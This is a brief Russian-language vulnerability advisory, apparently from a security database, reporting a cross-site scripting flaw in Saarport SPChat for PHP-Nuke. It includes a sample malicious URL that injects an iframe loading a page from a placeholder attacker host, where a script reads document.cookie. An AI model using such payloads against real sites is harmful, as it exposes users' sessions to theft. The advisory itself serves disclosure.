Межсайтовый скриптинг в SPChat

Дата публикации:
06.06.2003
Всего просмотров:
1216
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Saarport SPChat 1.x
Описание: Уязвимость в проверке правильности ввода обнаружена в SPChat. Удаленный пользователь может выполнить XSS нападение.

XyborG сообщает, что удаленный пользователь может сконструировать специально обработанный URL, который, когда будет загружен в браузере целевого пользователя, выполнит произвольный код сценария в контексте SPChat сайта. Пример:

http://[target]/modules.php?op=modload&name=SPChat&file=index&statussess=
<IF RAME%20src="http://[attacher]/attack.htm"
где http://[attacher]/attack.htm
<script>
alert(document.cookie);
</script>
Уязвимость обнаружена в SPChat 0.8.0

Ссылки: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
или введите имя

CAPTCHA